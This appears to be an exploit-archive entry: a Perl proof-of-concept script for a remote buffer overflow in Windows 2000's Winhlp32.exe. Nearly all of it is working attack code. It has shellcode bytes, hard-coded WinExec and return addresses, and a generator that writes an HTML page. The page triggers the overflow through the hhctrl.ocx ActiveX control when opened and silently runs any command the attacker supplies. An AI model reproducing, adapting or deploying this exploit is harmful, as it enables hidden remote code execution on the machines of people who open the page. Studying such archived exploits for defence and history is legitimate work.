Exploit code for Winhlp32.exe remote buffer overflow vulnerability. Calls WinExec SW_HIDE and executes supplied command. Tested against Windows 2000 Professional SP2. Written for Kernel32.dll version 5.0.2195.4272.
d51b5844b984733f335e621404e81da9ba3972f55afab24141b4eeba7aef7f17
# Winhlp32.exe Remote BufferOverrun exploit code. written by Gary O'leary-Steele Sec-1 Ltd. Garyo@sec-1.com
# For use as proof of concept
# Kernel32.dll version 5.0.2195.4272
####### Kernell32 jmp ebx 77E87793
$sploit =
"\x55\x8b\xec\x8b\xc3". #xc5 is ebp change if error
"\xbe\xff\xff\xff\xff".
"\x81\xEE\x85\x85\x85\x85".
"\x83\xc0\x01".
"\x8b\x10".
"\x3b\xd6".
"\x75\xf7".
"\x8b\xd8".
"\x83\xc3\x01".
"\x80\x6b\x03\x41".
"\x8b\x7b\x04".
"\x81\xff\x58\x58\x58\x58".
"\x75\xEE".
"\x81\x6b\x04\x58\x58\x58\x58".
"\x33\xf6".
"\x56".
"\x83\xc0\x04".
"\x50".
"\xbb\x94\xee\xe8\x77". # mov ebx, 0x77e8ee94 winexec() address
"\xff\xd3"; #call ebx
$exitproc =
"\xBB\x5d\xa9\xe8\x77".
"\x83\xeb\x01".
"\xff\xd3";
$RET = "\x24\xF1\x5d\x01";
$EIP2 = "\x93\x77\xe8\x77"; # This works
#$EIP2 = "\xf6\xbf\x30\x78";
# direct jump = 0006FBD4 ##$EIP2 = "\xd4\xfb\x06\x00";
print "Exploit code for Winhlp32.exe Remote BufferOverrun.\nBy Gary Oleary-Steele Sec-1 Ltd\nCalls WinExec SW_HIDE and executes supplied command\nTested on windows 2000 professional SP2\n\n";
print "Enter Command to execute: ";
$command =<STDIN>;
print "Enter Output File: ";
$outputfile =<STDIN>;
chomp $command;
chomp $outputfile;
open(INFILE,">$outputfile");
$command = encode($command);
$nn = 123 - length($command);
$nops = "\x90" x $nn;
$exploit = $sploit . "zzzz". $command .'XXXX'. $nops .$exitproc. $RET .$EIP2;
$f1= <<"file1";
<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11
codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp
type=application/x-oleobject width=0><PARAM NAME="Width"
VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command"
VALUE="WinHelp"><PARAM NAME="Item1"
VALUE='
file1
chomp $f1;
$f2= <<"file2";
'><PARAM
NAME="Item2" VALUE="Sec-1 LTD"></OBJECT>
<SCRIPT>winhelp.HHClick()</SCRIPT>
file2
print INFILE $f1.$exploit.$f2;
sub encode($command){
$lofcmd =length($command);
$i = 0;
for ($i ;$i < $lofcmd; $i++){
$chartoconvert = substr($command,$i,1); # pull out each character
$chartoconvert = ord($chartoconvert); # convert to a dec
for ($b=0; $b < 65; $b++){
$chartoconvert++ ;
}
$tmpchr = chr($chartoconvert); #convert back to chr
$newchar = $newchar . $tmpchr;
}
print $newchar;
return $newchar;
}